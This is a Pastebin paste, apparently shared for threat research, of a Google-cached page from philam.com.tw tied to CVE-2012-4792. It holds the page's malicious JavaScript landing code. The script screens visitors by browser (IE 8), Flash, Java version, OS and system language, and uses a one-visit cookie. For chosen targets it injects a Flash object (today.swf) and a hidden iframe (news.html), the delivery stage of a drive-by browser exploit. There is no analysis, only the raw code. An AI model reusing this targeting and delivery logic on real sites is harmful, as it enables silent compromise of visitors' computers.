Guest User

philam.com.tw CVE-2012-4792

a guest
Jan 3rd, 2013
296
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. http://jsunpack.jeek.org/?report=f4698cfca7b3d9a656142aef18b8f4611ea9c107
  2.  
  3.  
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <base href="http://www.philam.com.tw/package/Helps.html"><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">Ceci est le cache Google de <a href="http://www.philam.com.tw/package/Helps.html" style="text-decoration:underline;color:#00c">http://www.philam.com.tw/package/Helps.html</a>. Il s&#39;agit d&#39;un instantané de la page telle qu&#39;elle était affichée le 27 déc. 2012 14:02:28 GMT. La <a href="http://www.philam.com.tw/package/Helps.html" style="text-decoration:underline;color:#00c">page actuelle</a> peut avoir changé depuis cette date. <a href="http://support.google.com/websearch/bin/answer.py?hl=fr&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">En savoir plus</a><br>Astuce : Pour trouver rapidement votre terme de recherche sur cette page, appuyez sur <b>Ctrl+F</b> ou sur <b>⌘+F</b> (Mac), puis utilisez la barre de recherche.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:www.philam.com.tw/package/Helps.html&amp;hl=fr&amp;tbo=d&strip=1" style="text-decoration:underline;color:#00c">Version en texte seul</a></div>
  6. <div>&nbsp;</div></div></div><div style="position:relative">
  7. <html>
  8. <head>
  9. <script src=deployJava.js></script>
  10. <script type="text/javascript">
  11. function getCookieVal (offset)
  12. {
  13.     var endstr = document.cookie.indexOf (";", offset);
  14.     if (endstr == -1)
  15.     {
  16.         endstr = document.cookie.length;
  17.     }
  18.     return unescape(document.cookie.substring(offset, endstr));
  19. }
  20. function GetCookie (name)
  21. {
  22.     var arg = name + "=";
  23.     var alen = arg.length;
  24.     var clen = document.cookie.length;
  25.     var i = 0;
  26.     while (i < clen)
  27.        {
  28.        var j = i + alen;
  29.        if (document.cookie.substring(i, j) == arg)
  30.           return getCookieVal (j);
  31.        i = document.cookie.indexOf(" ", i) + 1;
  32.        if (i == 0)
  33.           break;
  34.        }
  35.     return null;
  36.     }
  37. function SetCookie (name, value)
  38. {
  39.     var argv = SetCookie.arguments;
  40.     var argc = SetCookie.arguments.length;
  41.     var expires = (2 < argc) ? argv[2] : null;
  42.     var path = (3 < argc) ? argv[3] : null;
  43.     var domain = (4 < argc) ? argv[4] : null;
  44.     var secure = (5 < argc) ? argv[5] : false;
  45.     document.cookie = name + "=" + escape (value) +
  46.       ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  47.       ((path == null) ? "" : ("; path=" + path)) +
  48.       ((domain == null) ? "" : ("; domain=" + domain)) +
  49.          ((secure == true) ? "; secure" : "");
  50. }
  51. function DisplayInfo()
  52. {
  53.     var expdate = new Date();
  54.     var visit;
  55.     expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
  56.     if(!(visit = GetCookie("visit")))
  57.     visit = 0;
  58.     visit++;
  59.     SetCookie("visit", visit, expdate, "/", null, false);
  60.     return visit;
  61. }
  62. var ua = window.navigator.userAgent.toLowerCase();
  63.  
  64. if (ua.indexOf('msie 8.0') <0)
  65. {
  66.     location.href="about:blank";
  67. }
  68.  
  69.     var f = 0;
  70.     try {
  71.         f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  72.     }
  73.     catch (e) {
  74.     }
  75.     var g=typeof f;
  76.  
  77.     if(g!="object")
  78.     {
  79.         location.href="about:blank";
  80.     }
  81.     var h=navigator.systemLanguage.toLowerCase();
  82.    
  83.     if(h!="zh-cn" && h!="en-us" && h!= "zh-tw"&& h!= "ja" && h!= "ru"&&h!= "ko" )
  84.     {
  85.  
  86.         location.href="about:blank";
  87.     }
  88.  
  89. var num=DisplayInfo();
  90. if(num >1)
  91. {
  92.     location.href="about:blank";
  93. }
  94. function download()
  95. {  
  96.     var xmlhttp;
  97.       try
  98.       {
  99.         xmlhttp = new XMLHttpRequest();
  100.       }
  101.       catch (e)
  102.       {
  103.         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  104.         var success = false;
  105.         for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  106.         {
  107.           try
  108.           {
  109.              xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  110.              success = true;
  111.           } catch (e)
  112.           {}
  113.         }
  114.      }
  115.     function callback()
  116.     {
  117.         if(xmlhttp.readyState==4)
  118.         {
  119.             if(xmlhttp.status==200)
  120.             {
  121.                 var temp=ua.replace(/ /g,"");
  122.                 if (temp.indexOf("nt6.1")>-1) {
  123.                
  124.            
  125.                         if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  126.                        
  127.                            
  128.                             document.getElementById('test').innerHTML="default";
  129.                             document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  130.                            
  131.                         }
  132.                         else
  133.                         {
  134.                          location.href="about:blank";
  135.                         }
  136.                 }
  137.                 else if(temp.indexOf("nt5.1")>-1)
  138.                 {
  139.                
  140.                     document.getElementById('test').innerHTML="cat";
  141.                     document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  142.                            
  143.                 }
  144.                 else
  145.                 {
  146.                   location.href="about:blank";
  147.                 }  
  148.            
  149.             }
  150.         }
  151.     }
  152.     xmlhttp.open("get", "xsainfo.jpg", true);  
  153.     xmlhttp.onreadystatechange = callback;
  154.     xmlhttp.send(null);
  155. }
  156.  
  157. </script>
  158. </head>
  159. <body onload="download()">
  160. <div style=display:none>
  161. <div id=test>hello</div>
  162. </div>
  163. </body>
  164. </html>
RAW Paste Data